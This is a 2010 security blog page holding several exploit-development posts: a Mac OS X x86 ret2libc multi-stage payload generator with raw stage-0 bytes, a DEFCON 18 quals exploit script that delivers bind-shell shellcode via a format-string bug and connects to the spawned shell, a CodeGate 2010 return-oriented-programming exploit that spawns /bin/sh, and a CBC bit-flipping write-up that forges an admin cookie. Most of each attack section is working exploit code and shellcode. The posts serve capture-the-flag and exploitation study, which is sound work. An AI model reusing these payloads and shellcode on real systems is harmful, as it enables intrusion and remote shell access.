Simple Mac OS X ret2libc exploit (x86)
October 5, 2010 by longld · 2 Comments
Talking about buffer overflow exploit on x86, Mac OS X is the most easy and hacker friendly target compare to Linux or Windows. OS X always loads /usr/lib/dyld at a fixed location and it contains a lot of helper stubs to launch the exploit. If you want something advanced likes ROP (Return-Oriented-Programming) exploit you may have a look at “Mac OS X Return-Oriented Exploitation” and thorough step-by-step guide “OSX ROP Exploit – EvoCam Case Study“. But actually, we don’t need ROP for 32-bit exploitation on OS X, simple ret2libc is enough and straightforward to implement. Let take a look at multi-stage ret2libc exploit on OS X.
The target
Under OSX, dyld is always loaded at a fixed location with __IMPORT page is RWX as shown below:
__TEXT 8fe00000-8fe0b000 [ 44K] r-x/rwx SM=COW /usr/lib/dyld __TEXT 8fe0b000-8fe0c000 [ 4K] r-x/rwx SM=PRV /usr/lib/dyld __TEXT 8fe0c000-8fe42000 [ 216K] r-x/rwx SM=COW /usr/lib/dyld __LINKEDIT 8fe70000-8fe84000 [ 80K] r--/rwx SM=COW /usr/lib/dyld __DATA 8fe42000-8fe44000 [ 8K] rw-/rwx SM=PRV /usr/lib/dyld __DATA 8fe44000-8fe6f000 [ 172K] rw-/rwx SM=COW /usr/lib/dyld __IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld
Our target is to transfer the desired shellcode to the __IMPORT section of dyld then execute it. We can simply do this with byte-per-byte copy way of ROPEME. There is some disadvantages with this method:
- Payload size is large, around 10 times of actual shellcode
- We have to re-generate the whole payload when changing to new shellcode
With OS X we can do it better as there is a RWX page at static location.
Staging payload
The most complicated part of ROP technique is “stack pivoting” or ESP register control under ASLR. By executing a small shellcode we can take ESP under control easily. Our multi-stage payload will look like:
Stage-2: actual shellcode
This is the last stage in our multi-stage payload. Any NULL-free shellcode can be used, e.g bind shell code from Metasploit.
Stage-1: shellcode loader for stage-2 payload
This stage will transfer stage-2 payload on stack to __IMPORT section (RWX) of dyld then executes it. The transfer function is _strcpy() in dyld. Below small shellcode will be executed on RWX page to perform the job:
# 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # src -> &shellcode # 50 push eax # dst -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode)
Stage-0: ret2libc loader for stage-1 payload
This stage will transfer 7 bytes of stage-1 payload to our RWX location using repeated _strcpy() calls, then executes it. We lookups the dyld for necessary byte values and copy it to the target byte-per-byte.
In summary, there is some advantages with our multi-stage payload:
- Straightforward to implement: only ret2libc calls, no gadget is required
- Payload size overhead is small: around 100 bytes
- Independent, generic loader code: no need to regenerate the whole payload, just append a new shellcode to make new payload
Automated payload generator
Let put all this together and make an automated payload generator in Python.
- Select the target
#__IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld TARGET = 0x8fe6f010 # to avoid NULL byte # dyld base address DYLDADDR = 0x8fe00000
- Extract dyld’s i386 code
# $ otool -f /usr/lib/dyld # ... #architecture 1 # cputype 7 # cpusubtype 3 # capabilities 0x0 # offset 352256 # size 368080 # align 2^12 (4096) # ... DYLDFILE = "/usr/lib/dyld" DYLDCODE = open(DYLDFILE, "rb").read() DYLDCODE = DYLDCODE[352256 : 352256+368080]
- _strcpy() call
# $ nm -arch i386 /usr/lib/dyld | grep _strcpy # 8fe2db10 t _strcpy STRCPY = 0x8fe2db10 # $ otool -arch i386 -tv /usr/lib/dyld | grep pop -A2 | grep ret -B1 | grep pop # 8fe28790 popl %edi # 8fe2b3d4 popl %edi POP2RET = 0x8fe2878f
- stage-1
# stage1 # 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # dst -> &shellcode # 50 push eax # src -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode) STAGE1 = "\x58\x5b\x54\x50\x50\x53\xc3"
- stage-0
# stage0: _strcpy sequences STAGE0 = gen_stage0(DYLDCODE, STAGE1)
Below is the stage-0 payload loader generated for OS X 10.6.4:
STAGE0 = ( "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f"
"\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" )
Test the payload with simple buffer overflow:
bash-3.2$ ./vuln "`python -c 'print "A"*272 + "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" + "\xcc"*4'` ... Trace/BPT trap bash-3.2$
Looking for the next? Maybe “Mac OS X ROP exploit on x86_64″ someday.
ROPEME – ROP Exploit Made Easy
ROPEME – ROP Exploit Made Easy – is a PoC tool for ROP exploit automation on Linux x86. It contains a set of simple Python scripts to generate and search for ROP gadgets from binaries and libraries (e.g libc). A sample payload class is also included to help generate multistage ROP payload with the technique described in the Black Hat USA 2010 talk: “Payload already inside: data re-use for ROP exploits“.
Check the latest paper and slides and PoC code.
And take a look at the demo video below:
Enjoy ROPing!
DEFCON 18 Quals: Pwtent Pwnables 500 esd2 exploit
May 28, 2010 by longld · Leave a Comment
CLGT did not solved this during the quals! Here is the exploit for the esd2 leaked from pp200 (thanks beist for sharing). More analysis & write up for the real pp500 will come later:
#!/usr/bin/env python
import socket
import struct
import telnetlib
import time
HOST = '192.168.56.101'
PORT = 8302
def xor_input(data):
static = "%5d | %5d\n" + "\x00"*4
out = ""
for i in range(len(data)):
out += chr(ord(static[i]) ^ ord(data[i]))
return out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# send password
s.send("sp3wn0w" + "\n")
# prepare the payload
# overwrite lseek@plt, original value = 0x08048ae2
target = 0x804a30c
# shellcode address = 0x0804a040 + 142 bytes (padding + fmt_string)
ret = 0x0804a0ce
# value to write into target
write_byte = 0xa0ce
# payload = target + padding(128 - 4) + 14 (fmt_string) + shellcode
padding = "A"*128
fmt_string = "%" + str(write_byte) + "u%24$hn"
fmt_string = xor_input(fmt_string)
# bindshell: port 5678
shellcode = "\x00\x29\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63\x7d\xa9\x09\x83\xeb\xfc\xe2\xf4\x09\x1c\xf1\x90\x31\x15\xb9\x0b\x75\x53\x20\xe8\x31\x3f\xfb\x4b\x31\x17\xb9\xc4\xe3\xe4\x3a\x58\x30\x2f\xc3\x61\x3b\xb0\x29\xb9\x09\xb0\x29\x5b\x30\x2f\x19\x17\xae\xfd\x3e\x63\x61\x24\xc3\x53\x3b\x2c\xfe\x58\xae\xfd\xe0\x70\x96\x2d\xc1\x26\x4c\x0e\xc1\x61\x4c\x1f\xc0\x67\xea\x9e\xf9\x5d\x30\x2e\x19\x32\xae\xfd\xa9\x09"
payload = struct.pack("<L", target) + padding[4:] + fmt_string + shellcode + "\n"
print "Sending payload...", repr(payload)
s.send("c\n" + str(len(payload)) +"\n")
s.send(payload)
# trigger the read_blob that calls lseek()
s.send("r\n" + "10\n")
print "Connecting to remote shell port 5678..."
time.sleep(4)
t = telnetlib.Telnet(HOST, 5678)
t.write("id\n\n")
t.interact()
t.close()
s.close()
Return-oriented-programming practice: exploiting CodeGate 2010 Challenge 5
April 18, 2010 by longld · 4 Comments
In my previous post about CodeGate 2010 Challenge 5 exploit, I mentioned the weakness of accessing server to get execl() address. In this post I will show how to blindly exploit the “harder” program without access to the remote server using return-oriented-programming technique.
ROP introduction
A worth to read post about ROP introduction can be found on Zynamics blog: http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/
In summary: we will use return-into-instructions (called gadgets) to build and execute our payload when controlled EIP and ESP from vulnerable program.
ROP limitations (difficulties):
- ASLR: the same as return-into-libc, it’s difficult to locate address of instructions in library (e.g libc)
- ASCII-armor address: with ascii-armor remapping of libraries (e.g libc), addresses will contain NULL byte so chaining return-into-libc calls and ROP is impossible if there’s NULL filter in input
The “harder” case
Fortunately, we can blindly exploit the “harder” program using ROP because it provides some “advantages” in code:
- getline(): can pass NULL byte to input
- printf(): can leak runtime memory info (bypass ASLR)
Finding ROP gadgets
Our target is to invoke execve(”/bin/sh”, 0, 0) syscall, which is equivalent to prepare registers’ value then trigger kernel syscall:
eax = 0xb // execve
ebx = address of “/bin/sh”
ecx = 0 // argv
edx = 0 // env
Searching in harder binary, we found below gadgets:
- eax:
80483a4: 58 pop %eax 80483a5: 5b pop %ebx 80483a6: c9 leave 80483a7: c3 ret
- ebx & ecx:
8048634: 59 pop %ecx 8048635: 5b pop %ebx 8048636: c9 leave 8048637: c3 ret
“/bin/sh” is placed on target buffer, its address is available by leaking via printf()
- edx:
There’s no edx related gadget but observing that when returned from memcpy() edx’s value is set to esi so we can assign esi to 0×0 first then return again to main to nullify edx.0x001ba506 : mov edx,esi 80485e6: 5e pop %esi 80485e7: 5f pop %edi 80485e8: 5d pop %ebp 80485e9: c3 ret
- syscall:
In recent Linux kernel, syscall is usually performed via linux gate: call gs:[0x10]. By return to back to printf() in harder program many times, we can find the offset from getline() to first syscall is 319 bytes.
- moving stack:
After “leave; ret” our stack will be moved to new location pointing by ebp. We can control this by set ebp back to somewhere in the middle of target buffer.
Exploit code
#!/usr/bin/env python
import socket
import sys
import struct
import telnetlib
#host = 'ctf4.codegate.org'
host = '127.0.0.1'
port = 9005
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect((host, port))
buf=""
# bypass first read
buf = c.recv(1024)
# getline() address
buf = "A"*268 + struct.pack('i', 0x08048524) + struct.pack('i', 0x0804a008) + "\n"
c.send(buf)
buf = c.recv(1024)
addr = ""
getline_addr = int(buf[:4][::-1].encode('hex'), 16)
print "getline() is at:", hex(getline_addr)
# call gs:[0x10] address
offset = 319 # first offset is 319 bytes from getline()
syscall_addr = getline_addr + offset
# buffer address
buf = "%7$x" + "\x00"*260 + struct.pack('i', 0x08048521)*2 + "\n"
c.send(buf)
buf = c.recv(1024)
input_addr = int(buf[:8], 16)
print "Buffer address is at: ", hex(input_addr)
# gadgets address
pop_eax = 0x080483a4
pop_ecx_ebx = 0x08048634
pop_esi = 0x080485e6
# pop esi
buf = "A"*268 + struct.pack('i', pop_esi) + "\x00" * 12 + struct.pack('i', 0x08048524)*2 + "\n"
c.send(buf)
c.recv(1024)
# pop eax then move stack to new address
input_addr += 560 # lifting after 2 getline() calls
new_stack = input_addr+8
buf = "/bin/sh\x00" # /bin/sh
buf += struct.pack('i', new_stack+16) # next ebp after leave from pop_eax
buf += struct.pack('i', pop_ecx_ebx) # next is pop_ecx_ebx
buf += "\x00"*4 # ecx
buf += struct.pack('i', input_addr) # ebx -> /bin/sh
buf += "A"*4 # un-used ebp after leave from pop_ecx_ebx
buf += struct.pack('i', syscall_addr)
buf = buf.ljust(264, "A") # padding
buf += struct.pack('i', new_stack) # new ebp
buf += struct.pack('i', pop_eax)
buf += "\x0b\x00\x00\x00" # execve syscal
buf += "A"*4 # un-used ebx
buf += "\n"
print "Sending final payload ..."
c.send(buf)
c.send("id 2>&1" + "\n"*5)
t = telnetlib.Telnet()
t.sock = c
t.interact()
c.close()
CodeGate 2010 – Challenge 8: Bit-flipping attack on CBC mode
March 23, 2010 by vnsec · Leave a Comment
Writeup for CodeGate 2010 Challenge 8 by namnx
This is a web-based cryptography challenge. In this challenge, we were provided a URL and a hint ”the first part is just an IV“.
The URL is: http://ctf1.codegate.org/99b5f49189e5a688492f13b418474e7e/web4.php.
Analysis
Go to the challenge URL. It will ask you the username for the first time. After we enter a value, for example ‘namnx‘, it will return only a single message “Hello, namnx!“. Examine the HTTP payload, we will see the cookie returned:
web4_auth=1vf2EJ15hKzkIxqB27w0AA==|5X5A0e3r48gXhUXZHEKBa5dpC+XfdVv4oamlriyi5yM=
The cookie includes 2 parts delimited by character ‘|’. After base64 decode the first part of the cookie, we have a 16-byte value. According to the hint, this is the IV of the cipher. And because it has 16-byte length, I guess that this challenge used AES cipher, and the block size is 16 bytes. Moreover, the cipher has an IV, so it can’t be in ECB mode. I guessed it in CBC mode. The last part is the base64 of a 32-byte value. This is a cipher text. We will exploit this value later.
Browse the URL again, we will receive another message: “Welcome back, namnx! Your role is: user. You need admin role.” Take a look into this message, we can guess the operation of this app: it will receive the cookie from the client, decrypt it to get the user and role information and return the message to the client based on the user and role information. So, in order to get further information, we must have the admin role. This is our goal in this challenge.
Exploit
I wrote some Python to work on this challenge easier:
import urllib, urllib2
import base64, re
url = 'http://ctf1.codegate.org/99b5f49189e5a688492f13b418474e7e/web4.php'
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
def get_cookie(user):
headers = { 'User-Agent' : user_agent}
values = {'username' : user, 'submit' : "Submit"}
data = urllib.urlencode(values)
request = urllib2.Request(url, data, headers)
response = urllib2.urlopen(request)
cookie = response.info().get('Set-Cookie')
groups = re.match("web4_auth=(.+)\|(.+);.+", cookie).groups()
iv = base64.b64decode(groups[0])
cipher = base64.b64decode(groups[1])
return iv, cipher
def get_message(iv, cipher):
cookie = base64.b64encode(iv) + '|' + base64.b64encode(cipher)
cookie = urllib.quote(cookie)
cookie = 'web4_auth=' + cookie
headers = { 'User-Agent' : user_agent, 'Cookie': cookie}
request = urllib2.Request(url, None, headers)
response = urllib2.urlopen(request)
data = response.read()
print repr(data)
groups = re.match(".+, (.*)! .+: (.*)\. You.+", data).groups()
return groups[0], groups[1]
The first function, get_cookie will submit a value as a username in the first visit to the page, get the returned cookie, and then parse it to get the IV and cipher. The second function, get_message, do the task like when you visit the page in later times, it parses the response message to get the returned username and role.
>>> iv, cipher = get_cookie('123456789012')
>>> len(cipher)
32
>>> iv, cipher = get_cookie('1234567890123')
>>> len(cipher)
48
When you input the user with a 12-byte value, the returned cipher will have 32 bytes (2 blocks). And when you enter a 13-byte value, the cipher will have 48 bytes (3 blocks). This means that beside the username value, the plain text of the cipher will be added more 20 bytes.
Try altering the cipher text to see how it is decrypted:
>>> iv, cipher = get_cookie('1234567890')
>>> cipher1 = cipher[:-1] + '\00'
>>> username, role = get_message(iv, cipher1)
'Welcome back, 1234567\xa2\xc2\xca\xfei\xdb\xee_c\xa7\xd7\x0c\xa9j\xe0\xbb! Your role is: . You need admin role.'
As you can see, the last block of the decrypted role is the first block of the plain text. So, the format of the plain text may be: ‘username=’ + username + [11 bytes].
To here, we can guess that the format of the plain text can be something like:
‘username=’ + username + [delimiter] + [param] + ‘=’ + [value]
The last 11 bytes of the plain text can be determined by the code below:
>>> iv, cipher = get_cookie('\x00')
>>> username, role = get_message(iv, cipher)
'Welcome back, \x00##role=user\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00! Your role is: . You need admin role.'
You can see the last 11 bytes of the plain text in the returned message. So, at this time, we can conclude format of the plain text is:
‘username=’ + username + ‘##role=’ + role
Now, the last thing we have to do is altering the role value to ‘admin’. Because we’ve already known the format of the plain text, we can choose to input the username close to the target plain text and try to alter the cipher text in the way that the decrypted value is what we want.
Let remind the operation of CBC mode in cryptographic ciphers. In encryption process:
y[1] = C(IV xor x[1])
y[n] = C(y[n-1] xor x[n])
and in the decryption:
x[1] = D(y[1]) xor IV
x[n] = D(y[n]) xor y[n-1]
Notice that if we flip one bit in the (n-1)th block of cipher text, the respective bit in the n-th block of plain text will be also flipped. So, we will you this fact to exploit the challenge:
>>> iv, cipher = get_cookie('012345678901234567890123#role=admin')
>>> s = cipher[:16] + chr(ord(cipher[16]) ^ 0x10) + cipher[17:]
>>> username, role = get_message(iv, s)
'Welcome back, 0123456L\xaa\x17m\xe9\x91\xdc\xe2`#z)\xd8m\xd8\x18! Your role is: admin. You need admin role. Congratulations! Here is your flag: the_magic_words_are_squeamish_ossifrage_^-^!!!!!'
Successful! Such an interesting challenge, isn’t it?

